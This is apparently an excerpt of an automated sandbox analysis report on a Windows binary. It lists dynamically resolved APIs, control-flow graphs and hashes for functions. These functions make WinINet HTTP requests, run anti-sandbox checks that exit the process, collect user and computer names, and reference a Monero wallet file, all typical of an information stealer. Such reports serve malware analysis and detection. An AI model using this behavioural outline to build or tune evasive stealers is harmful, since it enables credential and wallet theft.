                          • GetProcAddress.KERNEL32(750F0000,0127B2E8), ref: 0041A2CB
                          • GetProcAddress.KERNEL32(750F0000,0128C948), ref: 0041A2E3
                          • GetProcAddress.KERNEL32(750F0000,012763E0), ref: 0041A2FC
                          • GetProcAddress.KERNEL32(750F0000,01276500), ref: 0041A314
                          • GetProcAddress.KERNEL32(750F0000,0127B270), ref: 0041A32C
                          • GetProcAddress.KERNEL32(75A50000,0128C828), ref: 0041A352
                          • GetProcAddress.KERNEL32(75A50000,01276560), ref: 0041A36A
                          • GetProcAddress.KERNEL32(75A50000,01288910), ref: 0041A382
                          • GetProcAddress.KERNEL32(75A50000,0128CA38), ref: 0041A39B
                          • GetProcAddress.KERNEL32(75A50000,0128CA50), ref: 0041A3B3
                          • GetProcAddress.KERNEL32(75A50000,012765C0), ref: 0041A3CB
                          • GetProcAddress.KERNEL32(75A50000,01276420), ref: 0041A3E4
                          • GetProcAddress.KERNEL32(75A50000,0128C9F0), ref: 0041A3FC
                          • GetProcAddress.KERNEL32(75A50000,0128CA20), ref: 0041A414
                          • GetProcAddress.KERNEL32(75070000,01276300), ref: 0041A436
                          • GetProcAddress.KERNEL32(75070000,0128CA68), ref: 0041A44E
                          • GetProcAddress.KERNEL32(75070000,0128CA80), ref: 0041A466
                          • GetProcAddress.KERNEL32(75070000,0128CA98), ref: 0041A47F
                          • GetProcAddress.KERNEL32(75070000,0128CAF8), ref: 0041A497
                          • GetProcAddress.KERNEL32(74E50000,01276580), ref: 0041A4B8
                          • GetProcAddress.KERNEL32(74E50000,01276320), ref: 0041A4D1
                          • GetProcAddress.KERNEL32(75320000,01276360), ref: 0041A4F2
                          • GetProcAddress.KERNEL32(75320000,0128CCA8), ref: 0041A50A
                          • GetProcAddress.KERNEL32(6F060000,012762C0), ref: 0041A530
                          • GetProcAddress.KERNEL32(6F060000,01276340), ref: 0041A548
                          • GetProcAddress.KERNEL32(6F060000,01276400), ref: 0041A560
                          • GetProcAddress.KERNEL32(6F060000,0128CCC0), ref: 0041A579
                          • GetProcAddress.KERNEL32(6F060000,01276440), ref: 0041A591
                          • GetProcAddress.KERNEL32(6F060000,01276460), ref: 0041A5A9
                          • GetProcAddress.KERNEL32(6F060000,012764C0), ref: 0041A5C2
                          • GetProcAddress.KERNEL32(6F060000,01276520), ref: 0041A5DA
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                          • GetProcAddress.KERNEL32(74E00000,0128CCD8), ref: 0041A629
                          • GetProcAddress.KERNEL32(74E00000,01288940), ref: 0041A641
                          • GetProcAddress.KERNEL32(74E00000,0128CD38), ref: 0041A659
                          • GetProcAddress.KERNEL32(74E00000,0128CD50), ref: 0041A672
                          • GetProcAddress.KERNEL32(74DF0000,01276540), ref: 0041A693
                          • GetProcAddress.KERNEL32(6F9B0000,0128CDC8), ref: 0041A6B4
                          • GetProcAddress.KERNEL32(6F9B0000,012765E0), ref: 0041A6CD
                          • GetProcAddress.KERNEL32(6F9B0000,0128CB88), ref: 0041A6E5
                          • GetProcAddress.KERNEL32(6F9B0000,0128CBA0), ref: 0041A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                          • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                          • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                          • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                          Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1040 406314-406318 1033->1040 1041 40630d 1033->1041 1042 406509-406525 call 41a7a0 call 41a800 * 2 1040->1042 1043 40631e-406342 InternetConnectA 1040->1043 1041->1040 1061 406528-40652d 1042->1061 1044 406348-40634c 1043->1044 1045 4064ff-406503 InternetCloseHandle 1043->1045 1047 40635a 1044->1047 1048 40634e-406358 1044->1048 1045->1042 1050 406364-406392 HttpOpenRequestA 1047->1050 1048->1050 1052 4064f5-4064f9 InternetCloseHandle 1050->1052 1053 406398-40639c 1050->1053 1052->1045 1055 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 40639e-4063bf InternetSetOptionA 1053->1056 1059 406407-406427 call 41a740 call 41a800 * 2 1055->1059 1060 40642c-40644b call 418940 1055->1060 1056->1055 1059->1061 1066 4064c9-4064e9 call 41a740 call 41a800 * 2 1060->1066 1067 40644d-406454 1060->1067 1066->1061 1070 406456-406480 InternetReadFile 1067->1070 1071 4064c7-4064ef InternetCloseHandle 1067->1071 1075 406482-406489 1070->1075 1076 40648b 1070->1076 1071->1052 1075->1076 1080 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1075->1080 1076->1071 1080->1070
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00406385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                          • InternetCloseHandle.WININET(00000000), ref: 004064EF
                          • InternetCloseHandle.WININET(00000000), ref: 004064F9
                          • InternetCloseHandle.WININET(00000000), ref: 00406503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 4bffbc6298ce5bde29073934a1559e313ab5fcbc159c72d221c735d430b420b5
                          • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                          • Opcode Fuzzy Hash: 4bffbc6298ce5bde29073934a1559e313ab5fcbc159c72d221c735d430b420b5
                          • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                          Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1106 41557c-415583 1090->1106 1107 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1106->1107 1108 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1106->1108 1124 4155bb-4155d2 call 41a8a0 call 41a800 1107->1124 1133 415693-4156a9 call 41aad0 StrCmpCA 1108->1133 1137 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1108->1137 1124->1133 1140 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1133->1140 1141 4156af-4156b6 1133->1141 1137->1133 1272 415ac3-415ac6 1140->1272 1144 4157da-41585f call 41aad0 StrCmpCA 1141->1144 1145 4156bc-4156c3 1141->1145 1165 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1144->1165 1166 415865-41586c 1144->1166 1146 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1145->1146 1147 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1147->1250 1165->1272 1167 415872-415879 1166->1167 1168 41598f-415a14 call 41aad0 StrCmpCA 1166->1168 1174 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1167->1174 1175 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1167->1175 1197 415a16-415a21 Sleep 1168->1197 1198 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1168->1198 1174->1168 1276 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
                          APIs
                            • Part of subcall function 0041A820: lstrlen.KERNEL32(00404F05,?,?,00404F05,00420DDE), ref: 0041A82B
                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0041A885
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                            • Part of subcall function 004152C0: lstrlen.KERNEL32(00000000), ref: 0041532F
                            • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                            • Part of subcall function 004152C0: lstrlen.KERNEL32(00000000), ref: 00415383
                            • Part of subcall function 004152C0: lstrlen.KERNEL32(00000000), ref: 004153AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                          • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                          • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                          • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                          Function 004117A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 4117a0-4117cd call 41aad0 StrCmpCA 1304 4117d7-4117f1 call 41aad0 1301->1304 1305 4117cf-4117d1 ExitProcess 1301->1305 1309 4117f4-4117f8 1304->1309 1310 4119c2-4119cd call 41a800 1309->1310 1311 4117fe-411811 1309->1311 1313 411817-41181a 1311->1313 1314 41199e-4119bd 1311->1314 1316 411821-411830 call 41a820 1313->1316 1317 411849-411858 call 41a820 1313->1317 1318 4118ad-4118be StrCmpCA 1313->1318 1319 4118cf-4118e0 StrCmpCA 1313->1319 1320 41198f-411999 call 41a820 1313->1320 1321 4118f1-411902 StrCmpCA 1313->1321 1322 411951-411962 StrCmpCA 1313->1322 1323 411970-411981 StrCmpCA 1313->1323 1324 411913-411924 StrCmpCA 1313->1324 1325 411932-411943 StrCmpCA 1313->1325 1326 411835-411844 call 41a820 1313->1326 1327 41185d-41186e StrCmpCA 1313->1327 1328 41187f-411890 StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1344 4118c0-4118c3 1318->1344 1345 4118ca 1318->1345 1346 4118e2-4118e5 1319->1346 1347 4118ec 1319->1347 1320->1314 1348 411904-411907 1321->1348 1349 41190e 1321->1349 1331 411964-411967 1322->1331 1332 41196e 1322->1332 1334 411983-411986 1323->1334 1335 41198d 1323->1335 1350 411930 1324->1350 1351 411926-411929 1324->1351 1329 411945-411948 1325->1329 1330 41194f 1325->1330 1326->1314 1340 411870-411873 1327->1340 1341 41187a 1327->1341 1342 411892-41189c 1328->1342 1343 41189e-4118a1 1328->1343 1329->1330 1330->1314 1331->1332 1332->1314 1334->1335 1335->1314 1340->1341 1341->1314 1355 4118a8 1342->1355 1343->1355 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1314 1351->1350 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 004117C5
                          • ExitProcess.KERNEL32 ref: 004117D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 7f408f1591d611580e04ec924439935c28397a15e27e27f9e4116566d6ebdbf4
                          • Instruction ID: 0405e5a3f07d781a82fc2c844c85a24eb00bc6dbff14658bd7033dab7d51b311
                          • Opcode Fuzzy Hash: 7f408f1591d611580e04ec924439935c28397a15e27e27f9e4116566d6ebdbf4
                          • Instruction Fuzzy Hash: DD517DB4A20209EFCB04DFA0D954BFE77B5BF44304F10804AE516A7361D778E992CB6A
                          Function 00417500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 417500-41754a GetWindowsDirectoryA 1357 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1356->1357 1358 41754c 1356->1358 1365 4175d8-4175df 1357->1365 1358->1357 1366 4175e1-4175fa call 418d00 1365->1366 1367 4175fc-417617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 417619-417626 call 41a740 1367->1369 1370 417628-417658 wsprintfA call 41a740 1367->1370 1377 41767e-41768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0041760A
                          • wsprintfA.USER32 ref: 00417640
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$B
                          • API String ID: 1544550907-183544611
                          • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                          • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                          • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                          • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                          Function 004169F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280630), ref: 004198A1
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280798), ref: 004198BA
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280678), ref: 004198D2
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012806D8), ref: 004198EA
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012805E8), ref: 00419903
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012889B0), ref: 0041991B
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012766C0), ref: 00419933
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01276680), ref: 0041994C
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280828), ref: 00419964
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280618), ref: 0041997C
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280840), ref: 00419995
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280600), ref: 004199AD
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012767C0), ref: 004199C5
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280558), ref: 004199DE
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                            • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?), ref: 0040116A
                            • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                            • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0040112B
                            • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00401132
                            • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                            • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                            • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                            • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32 ref: 00416774
                            • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                            • Part of subcall function 00417850: RtlAllocateHeap.NTDLL(00000000), ref: 00417887
                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417910
                            • Part of subcall function 004178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00417917
                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                          • Sleep.KERNEL32(00001770), ref: 00416B04
                          • CloseHandle.KERNEL32(?,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                          • ExitProcess.KERNEL32 ref: 00416B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
